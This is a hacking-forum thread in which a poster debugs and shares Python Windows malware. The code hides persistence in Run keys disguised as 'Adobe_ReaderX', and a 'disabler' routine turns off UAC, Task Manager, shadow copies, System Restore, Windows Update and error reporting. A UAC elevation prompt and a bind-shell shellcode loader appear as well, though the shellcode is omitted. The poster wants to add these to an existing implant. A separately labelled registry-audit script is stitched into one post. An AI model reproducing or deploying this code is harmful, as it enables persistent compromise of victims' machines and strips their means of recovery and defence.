Why the hell doesn't this work.

  1. #1
    Sophie Pedophile Tech Support
    When I try to copy my executable to the %TEMP% folder with the following piece of code it doesn't work. Instead a folder gets copied to the %TEMP% directory in my VM that has a bunch of python.dll files and such but no executable.


    import sys, os
    import win32event
    import win32api
    import winerror
    import shutil
    from _winreg import *


    # Only allow one instance
    mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
    if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
        mutex = None
        exit(0)

    class pwn():
        # Copy to %TEMP%
        def persistence():
            app_path = os.path.dirname(sys.executable)
            fileName = sys.argv[0]
            config_path = os.path.join(app_path, fileName)
            tempdir = '%TEMP%'
            if tempdir == current:
                k =1
            else:
                shutil.copy2(config_path, tempdir)

            # Add to registry for persistence
            try:
                aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
                aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE)
                SetValueEx(aKey,"foobar",1, REG_SZ, r"%TEMP%\mw.exe")
                CloseKey(aKey)
            except:
                pass

    ###############################
    #Sooper evil malware code goes here#
    ###############################




    Yet with this piece of code everything operates as it should and the executable gets copied to the %TEMP% directory, as it should because the registry entry is pointing that way.


    import os
    import sys
    import os.path
    import pywintypes
    import win32api
    from _winreg import *


    def autorun(tempdir, fileName, run):
        # Copy executable to %TEMP%:
        os.system('copy %s %s'%(fileName, tempdir))

        # Queries Windows registry for the autorun key value
        # Stores the key values in runkey array
        key = OpenKey(HKEY_LOCAL_MACHINE, run)
        runkey =[]
        try:
            i = 0
            while True:
                subkey = EnumValue(key, i)
                runkey.append(subkey[0])
                i += 1
        except WindowsError:
            pass

        # If the autorun key "Adobe ReaderX" isn't set this will set the key:
        if 'Adobe ReaderX' not in runkey:
            try:
                key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
                SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
                key.Close()
            except WindowsError:
                pass

    ###############################
    #Sooper evil malware code goes here#
    ###############################

    def main():
        tempdir = '%TEMP%'
        fileName = sys.argv[0]
        run = "Software\Microsoft\Windows\CurrentVersion\Run"
        autorun(tempdir, fileName, run)
        execute()

    if __name__ == "__main__":
        main()


    Yet when I tried this in my first piece of code the executable did not get copied again.


    def autorun():
        tempdir = '%TEMP%'
        fileName = sys.argv[0]
        os.system('copy %s %s'%(fileName, tempdir))

    autorun()


    So why does it work in one script and it doesn't in another, and even after I tried to do the copying with shutil in the original script? Also, for some reason the code for messing with the registry doesn't seem to do much while I am pretty sure it's the right way of doing it. Perhaps it has something to do with user privilege or something but IDK. In any event any help would be greatly appreciated.
  2. #2
    LiquidIce Houston
    Have you tried tempfile (https://docs.python.org/2/library/tempfile.html) ?

    The code looks legit, I can only guess python+windows doesn't like copying to '%TEMP%'. Is %TEMP% an environment variable? If so, you could try getting the value of %TEMP% ie. os.getenv('TEMP').
  3. #3
    Sophie Pedophile Tech Support
    Have you tried tempfile (https://docs.python.org/2/library/tempfile.html) ?

    The code looks legit, I can only guess python+windows doesn't like copying to '%TEMP%'. Is %TEMP% an environment variable? If so, you could try getting the value of %TEMP% ie. os.getenv('TEMP').

    Just make my own temporary folder and copy it to that, that might be a good idea if I can't get it to %TEMP%. Still it's silly that in one script the executable does get copied over and the other it doesn't.
  4. #4
    LiquidIce Houston
    Yeah, I'm guessing it's something windows specific. Lots of crazy stuff happen on windows, but maybe I never developed much on that platform. The tempfile module should take care of everything for you ie. it knows where to create a tmp file and it allows you to create named files and all.

    Btw, are you going somewhere with this script or is it just for learning? I've always dismissed python as an attack vector because the web always seemed a lot easier.
  5. #5
    Sophie Pedophile Tech Support
    Yeah, I'm guessing it's something windows specific. Lots of crazy stuff happen on windows, but maybe I never developed much on that platform. The tempfile module should take care of everything for you ie. it knows where to create a tmp file and it allows you to create named files and all.

    Btw, are you going somewhere with this script or is it just for learning? I've always dismissed python as an attack vector because the web always seemed a lot easier.

    Not sure what you mean with 'web always seemed a lot easier' but I just like to make dank malware in my spare time. I actually wanted to open a pull request for gcat https://github.com/byt3bl33d3r/gcat/...ter/implant.py and add the following code to make it nastier.



    ############################
    #Original gcat code goes here
    ############################

    # Only allow one instance
    mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
    if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
        mutex = None
        exit(0)

    class pwn():

        def persistence():
            app_path = os.path.dirname(sys.executable)
            filename = sys.argv[0]
            config_path = os.path.join(app_path, filename)
            tempdir = '%TEMP%'
            if tempdir == current:
                k =1
            else:
                shutil.copy2(config_path, tempdir)

            try:
                aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
                aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE)
                SetValueEx(aKey,"foobar",1, REG_SZ, r"%TEMP%\implant.exe")
                CloseKey(aKey)
            except:
                pass

        def disabler():
            try:
                aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
                aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\Windows Error Reporting", 0, KEY_WRITE)
                subkeys = [ "Disabled", "DontSendAdditionalData", "LoggingDisabled" ]
                for subkey in subkeys:
                    SetValueEx(aKey,subkey,0, REG_SZ, r"1")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
                aKey = OpenKey(aReg, r"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_WRITE)
                SetValueEx(aKey,"EnableLUA",0, REG_SZ, r"0")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
                aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\Windows Error Reporting", 0, KEY_WRITE)
                SetValueEx(aKey,"Disabled",0, REG_SZ, r"1")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
                aKey = OpenKey(aReg, r"System\\CurrentControlSet\\Services\\vss", 0, KEY_WRITE)
                SetValueEx(aKey,"Start",0, REG_SZ, r"4")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
                aKey = OpenKey(aReg, r"System\\CurrentControlSet\\Services\\srservice", 0, KEY_WRITE)
                SetValueEx(aKey,"Start",0, REG_SZ, r"4")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
                aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", 0, KEY_WRITE)
                SetValueEx(aKey,"DisableSR",0, REG_SZ, r"1")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
                aKey = OpenKey(aReg, r"SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", 0, KEY_WRITE)
                SetValueEx(aKey,"NoAutoUpdate",0, REG_SZ, r"1")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
                aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_WRITE)
                SetValueEx(aKey,"DisableTaskMgr",0, REG_SZ, r"1")
                CloseKey(aKey)
            except:
                pass


    ############################
    #Original gcat code goes here
    ############################




    I already forked it over to make a sort of stager.

    https://github.com/NullArray/gcat/blob/master/stager.py

    But i figured the new improvements would be better.

    I also made this just for keks.


    import os
    import sys
    import ctypes
    import os.path
    import pythoncom
    import pywintypes
    import win32api
    import subprocess
    from _winreg import *
    import win32com.shell.shell as shell

    class pwn():

        def disabler():
            try:
                aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
                aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\Windows Error Reporting", 0, KEY_WRITE)
                subkeys = [ "Disabled", "DontSendAdditionalData", "LoggingDisabled" ]
                for subkey in subkeys:
                    SetValueEx(aKey,subkey,0, REG_SZ, r"1")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
                aKey = OpenKey(aReg, r"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_WRITE)
                SetValueEx(aKey,"EnableLUA",0, REG_SZ, r"0")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
                aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\Windows Error Reporting", 0, KEY_WRITE)
                SetValueEx(aKey,"Disabled",0, REG_SZ, r"1")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
                aKey = OpenKey(aReg, r"System\\CurrentControlSet\\Services\\vss", 0, KEY_WRITE)
                SetValueEx(aKey,"Start",0, REG_SZ, r"4")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
                aKey = OpenKey(aReg, r"System\\CurrentControlSet\\Services\\srservice", 0, KEY_WRITE)
                SetValueEx(aKey,"Start",0, REG_SZ, r"4")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
                aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", 0, KEY_WRITE)
                SetValueEx(aKey,"DisableSR",0, REG_SZ, r"1")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
                aKey = OpenKey(aReg, r"SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", 0, KEY_WRITE)
                SetValueEx(aKey,"NoAutoUpdate",0, REG_SZ, r"1")
            except:
                pass

            try:
                aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
                aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_WRITE)
                SetValueEx(aKey,"DisableTaskMgr",0, REG_SZ, r"1")
                CloseKey(aKey)
            except:
                pass



    def autorun(tempdir, fileName, run):
        # Copy executable to %TEMP%:
        os.system('copy %s %s'%(fileName, tempdir))

        # Queries Windows registry for the autorun key value
        # Stores the key values in runkey array
        key = OpenKey(HKEY_LOCAL_MACHINE, run)
        runkey =[]
        try:
            i = 0
            while True:
                subkey = EnumValue(key, i)
                runkey.append(subkey[0])
                i += 1
        except WindowsError:
            pass

        # If the autorun key "Adobe ReaderX" isn't set this will set the key:
        if 'Adobe ReaderX' not in runkey:
            try:
                key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
                SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
                key.Close()
            except WindowsError:
                pass


    def execute():
        #Bind shell
        shellcode = bytearray(b"")  # raw shellcode bytes omitted from this listing

        ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                                  ctypes.c_int(len(shellcode)),
                                                  ctypes.c_int(0x3000),
                                                  ctypes.c_int(0x40))

        buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

        ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                             buf,
                                             ctypes.c_int(len(shellcode)))

        ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                                 ctypes.c_int(0),
                                                 ctypes.c_int(ptr),
                                                 ctypes.c_int(0),
                                                 ctypes.c_int(0),
                                                 ctypes.pointer(ctypes.c_int(0)))

        ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

    def main():
        tempdir = '%TEMP%'
        fileName = sys.argv[0]
        run = "Software\Microsoft\Windows\CurrentVersion\Run"
        autorun(tempdir, fileName, run)
        execute()


    if not shell.IsUserAnAdmin():
        # Prompt UAC
        ASADMIN = "asadmin"

        if sys.argv[-1] != ASADMIN:
            script = os.path.abspath(sys.argv[0])
            params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
            shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
            sys.exit(0)

    if __name__ == "__main__":
        main()


    But on WinXP (my VM) the registry tampering doesn't quite work for some reason. Also, feel free to follow me on github, if you have one as well I'll follow you back. https://github.com/NullArray
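    From the defender's side, every change the scripts above make is a registry write that can be audited from a host. The following is an added example, not code from the thread or from gcat: it parses saved `reg query` output, flags Run entries that launch from %TEMP% (or any \Temp\ path, a small generalisation of the thread's value) and flags the values the "disabler" routine rewrites when they hold its disabling data, folding REG_DWORD hex output so a Start value stored as a DWORD is caught too. The sample output is constructed, not captured from a real machine.

```python
import re
# Values the posted "disabler" rewrites, keyed by (key path, value name) in lower case,
# mapped to the data that means the protection is off (hives and names from the thread).
TAMPER_SIGNATURES = {
    (r"hkey_current_user\software\microsoft\windows\currentversion\policies\system", "enablelua"): "0",
    (r"hkey_current_user\software\microsoft\windows\currentversion\policies\system", "disabletaskmgr"): "1",
    (r"hkey_current_user\software\microsoft\windows\windows error reporting", "disabled"): "1",
    (r"hkey_local_machine\software\microsoft\windows\windows error reporting", "disabled"): "1",
    (r"hkey_local_machine\system\currentcontrolset\services\vss", "start"): "4",
    (r"hkey_local_machine\system\currentcontrolset\services\srservice", "start"): "4",
    (r"hkey_local_machine\software\microsoft\windows nt\currentversion\systemrestore", "disablesr"): "1",
    (r"hkey_local_machine\software\policies\microsoft\windows\windowsupdate\au", "noautoupdate"): "1",
}
VALUE_RE = re.compile(r"^\s+(\S.*?)\s{2,}(REG_\w+)\s{2,}(.*)$")  # name / type / data columns

def parse_reg_query(text):
    """Turn `reg query` output into {key path: {value name: data}}, keys and names case-folded."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = keys.setdefault(line.strip().lower(), {})
        elif current is not None and (m := VALUE_RE.match(line)):
            data = m.group(3).strip()
            # REG_DWORD prints as hex (0x4); fold it to the decimal string the posted code writes
            current[m.group(1).lower()] = str(int(data, 16)) if data.lower().startswith("0x") else data
    return keys

def find_tampering(text):
    """Flag Run entries launched from a temp path and protections set to the disabler's values."""
    findings = []
    for key, values in parse_reg_query(text).items():
        for name, data in values.items():
            if key.endswith(("\\currentversion\\run", "\\currentversion\\runonce")) and \
                    ("%temp%" in data.lower() or "\\temp\\" in data.lower()):
                findings.append(("run-from-temp", key, name, data))
            elif TAMPER_SIGNATURES.get((key, name)) == data:
                findings.append(("protection-disabled", key, name, data))
    return findings

# Constructed sample resembling concatenated `reg query` output; not captured from a real host.
SAMPLE = """HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    OneDrive    REG_SZ    "C:\\Users\\me\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background
    foobar    REG_SZ    %TEMP%\\mw.exe
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
    EnableLUA    REG_SZ    0
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\vss
    Start    REG_DWORD    0x4
"""
```

Feed it the output of `reg query <key>` for the Run keys, the Policies\System key and the service keys named above; `find_tampering(SAMPLE)` reports the foobar Run entry, EnableLUA=0 and the vss service set to disabled.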
  6. #6
    Sophie Pedophile Tech Support
    Also python is good shit, you can make malware with it, you can make infosec tools, just about every sec script is written in python unless we're talking metasploit then it's ruby. However I have a custom pentest framework which runs ruby, python, shellscripts, you name it, I've also integrated it with metasploit it's dank as fuck.